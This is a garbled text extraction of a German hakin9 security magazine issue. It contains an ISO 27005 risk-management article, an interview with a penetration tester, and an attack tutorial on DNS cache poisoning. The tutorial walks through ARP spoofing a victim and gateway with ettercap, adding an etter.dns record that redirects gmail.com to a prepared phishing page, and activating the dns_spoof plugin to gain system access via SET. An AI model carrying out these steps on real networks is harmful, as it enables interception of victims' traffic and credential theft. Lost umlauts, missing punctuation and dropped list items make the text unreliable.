secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
